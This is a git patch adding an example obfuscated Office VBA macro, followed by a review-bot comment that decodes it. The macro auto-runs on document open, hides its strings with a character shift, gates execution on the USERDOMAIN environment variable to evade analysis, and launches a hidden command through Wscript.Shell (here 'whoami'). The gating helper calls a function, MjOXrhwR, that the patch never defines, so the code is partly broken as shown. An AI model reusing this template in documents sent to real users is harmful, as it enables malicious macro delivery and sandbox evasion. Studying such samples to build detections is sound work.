From a2426daf75b5632d6771109390a575c92ef73777 Mon Sep 17 00:00:00 2001
From: Mr-Un1k0d3r
Date: Fri, 11 Nov 2016 15:31:15 -0500
Subject: [PATCH] Create generic-cmd-evasion.vba
---
examples/generic-cmd-evasion.vba | 94 ++++++++++++++++++++++++++++++++
1 file changed, 94 insertions(+)
create mode 100644 examples/generic-cmd-evasion.vba
diff --git a/examples/generic-cmd-evasion.vba b/examples/generic-cmd-evasion.vba
new file mode 100644
index 0000000..f995421
--- /dev/null
+++ b/examples/generic-cmd-evasion.vba
@@ -0,0 +1,94 @@
+Sub AutoOpen()
+ Dim XHKmhxHQcRTz As String
+ Dim THSEubLQvPSdELSuoGX As Object
+ Dim FJGotBFzvCOdl As Integer
+ Dim EeiAeMHMgPdtBzW As String
+ Dim GGfyeZZ As String
+
+ FJGotBFzvCOdl = 364
+ XHKmhxHQcRTz = "[wgvmtx2Wlipp"
+ GGfyeZZ = OguRQlS()
+ If (GGfyeZZ = "NVKVXMEGmpW") Then
+ Set THSEubLQvPSdELSuoGX = CreateObject(kbilYvbsscC(XHKmhxHQcRTz))
+ EeiAeMHMgPdtBzW = vmLhBnhohStHTGkJVFvtodv("bhEpnbsamPxDwVcWJzlublMQ")
+ EeiAeMHMgPdtBzW = VBiSUNVKeBGIhcPkb(THSEubLQvPSdELSuoGX, EeiAeMHMgPdtBzW, FJGotBFzvCOdl)
+ End If
+End Sub
+
+Function vmLhBnhohStHTGkJVFvtodv(ZROwKJd As String) As String
+ Dim oVMgsBnBXNOpBX As String
+ Dim OoSwSrwLrWhP As String
+ Dim MJDDNqez As String
+ MJDDNqez = "gqh2i|i$3g${lseqm"
+
+ oVMgsBnBXNOpBX = MJDDNqez
+ oVMgsBnBXNOpBX = kbilYvbsscC(oVMgsBnBXNOpBX)
+ vmLhBnhohStHTGkJVFvtodv = oVMgsBnBXNOpBX
+End Function
+
+Function VBiSUNVKeBGIhcPkb(GKzgZylVXGWz As Object, SrTboMsIUaGgfoswbnqxNbDZ As String, GMIuliLqzJCayCzKHCoq As Integer) As String
+ Dim fFOceCgNlEZwEpqr As String
+ Dim ENFykwKonc As Integer
+ ENFykwKonc = 4
+ fFOceCgNlEZwEpqr = SrTboMsIUaGgfoswbnqxNbDZ
+ If (GMIuliLqzJCayCzKHCoq > ENFykwKonc) Then
+ ENFykwKonc = GMIuliLqzJCayCzKHCoq - GMIuliLqzJCayCzKHCoq
+ GKzgZylVXGWz.Run fFOceCgNlEZwEpqr, ENFykwKonc, True
+ End If
+ fFOceCgNlEZwEpqr = "IjIurrYiWJxH"
+ VBiSUNVKeBGIhcPkb = fFOceCgNlEZwEpqr
+End Function
+
+
+Function kbilYvbsscC(dfjsgXiTXlcBLjeRryfvoqY As String) As String
+ Dim eqQwyyjmAEVAMy As Long
+ Dim CdMxcxbCahltDjPZG As String
+ Dim JBRbbDxDBbJIlOy As Integer
+ JBRbbDxDBbJIlOy = 4
+ For eqQwyyjmAEVAMy = 1 To Len(dfjsgXiTXlcBLjeRryfvoqY)
+ CdMxcxbCahltDjPZG = CdMxcxbCahltDjPZG & Chr(Asc(Mid(dfjsgXiTXlcBLjeRryfvoqY, eqQwyyjmAEVAMy, 1)) - JBRbbDxDBbJIlOy)
+ Next eqQwyyjmAEVAMy
+ kbilYvbsscC = CdMxcxbCahltDjPZG
+End Function
+
+Function OguRQlS() As String
+ Dim fHNbSbwUyNulLLVThkN As String
+ fHNbSbwUyNulLLVThkN = "bhEpnbsamPxDwVcWJzlublMQ"
+ fHNbSbwUyNulLLVThkN = qvAKTNfitsA(fHNbSbwUyNulLLVThkN)
+ fHNbSbwUyNulLLVThkN = VpxqjMIiANZg(fHNbSbwUyNulLLVThkN)
+ OguRQlS = fHNbSbwUyNulLLVThkN
+End Function
+
+Function VpxqjMIiANZg(fHNbSbwUyNulLLVThkN As String) As String
+ Dim eeyJYtLZQheDgmcj As String
+ Dim YxfUNvpKSEvuCWsQOQVDxf As String
+ Dim yjsEKLikmZcAMAjWmV As String
+ Dim GvMfkAxzfzgIhxFFInO As Integer
+ GvMfkAxzfzgIhxFFInO = 637
+ YxfUNvpKSEvuCWsQOQVDxf = "kbilYvbsscC"
+ yjsEKLikmZcAMAjWmV = "VMRK^IV4"
+ YxfUNvpKSEvuCWsQOQVDxf = MjOXrhwR(YxfUNvpKSEvuCWsQOQVDxf, yjsEKLikmZcAMAjWmV, GvMfkAxzfzgIhxFFInO)
+ eeyJYtLZQheDgmcj = YxfUNvpKSEvuCWsQOQVDxf
+ If (UCase(fHNbSbwUyNulLLVThkN) = eeyJYtLZQheDgmcj) Then
+ VpxqjMIiANZg = "NVKVXMEGmpW"
+ Else
+ VpxqjMIiANZg = "bHWfwRqCNh"
+ End If
+End Function
+
+Function qvAKTNfitsA(BMpIooCasKG As String) As String
+ Dim ufvKyCNiHHogKLXqt As String
+ Dim EqrXsnePmksKAhhYJzaBFIp As String
+ Dim nEdEMfbClbgkYZTDjXJbia As Integer
+ nEdEMfbClbgkYZTDjXJbia = 6104
+ EqrXsnePmksKAhhYJzaBFIp = "kbilYvbsscC"
+ EqrXsnePmksKAhhYJzaBFIp = btsMlRsLgrTbWEVydvEQpnAa(EqrXsnePmksKAhhYJzaBFIp, "YWIVHSQEMR", nEdEMfbClbgkYZTDjXJbia)
+ ufvKyCNiHHogKLXqt = Environ(EqrXsnePmksKAhhYJzaBFIp)
+ qvAKTNfitsA = ufvKyCNiHHogKLXqt
+End Function
+
+Function btsMlRsLgrTbWEVydvEQpnAa(pInSpXFfvHlmlwguszddsz As String, NCIYhLMxGmhRfSQD As String, NqYrqajngCuizeuhgQnf As Integer) As String
+ If (NqYrqajngCuizeuhgQnf > 1) Then
+ btsMlRsLgrTbWEVydvEQpnAa = Application.Run(pInSpXFfvHlmlwguszddsz, NCIYhLMxGmhRfSQD)
+ End If
+End Function
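Review bot: The example is added with no header comment, so a reader has to decode every literal by hand to learn what the macro does; a short comment block above `Sub AutoOpen()` should state it. From the visible code, `kbilYvbsscC` subtracts 4 from each character, which turns the literals into `Wscript.Shell`, `cmd.exe /c whoami` and `USERDOMAIN`, and `AutoOpen` reaches `.Run` (window style 0, wait `True`) only when `OguRQlS` returns the expected token. The comparison value in `VpxqjMIiANZg` comes from `MjOXrhwR`, which is not defined anywhere in this hunk, so that part of the gate can only be inferred from the sibling helper `btsMlRsLgrTbWEVydvEQpnAa`. Suggested header: `' Example generator output: AutoOpen runs "cmd.exe /c whoami" via Wscript.Shell only when %USERDOMAIN% matches the configured value; every string literal is shifted by 4.` Naming the `AutoOpen`, `Environ`, `CreateObject` and `Application.Run` calls in that comment would also let the sample double as a reference for anyone writing detections.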